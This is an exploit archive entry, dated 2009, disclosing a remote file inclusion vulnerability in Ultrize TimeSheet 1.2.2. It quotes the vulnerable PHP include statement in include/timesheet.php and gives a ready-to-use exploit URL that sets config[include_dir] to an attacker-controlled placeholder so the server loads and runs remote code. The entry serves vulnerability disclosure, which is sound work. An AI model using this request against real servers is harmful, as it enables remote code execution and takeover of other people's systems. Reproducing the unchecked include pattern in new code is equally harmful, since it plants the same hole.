id: 5575
date: 07/27/2009
title: Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability
author: NoGe
cves: 

===========================================================
Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability
===========================================================


=====================================================================================


  [o] Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

       Software : Ultrize TimeSheet version 1.2.2
       Vendor   : http://www.ultrize.com/
       Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
       Author   : NoGe

=====================================================================================


  [o] Vulnerable file


       include($config['include_dir'].'timesheet.class.php');

        include/timesheet.php



  [o] Exploit

       http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]


=====================================================================================




#  0day.today [2023-03-24]  #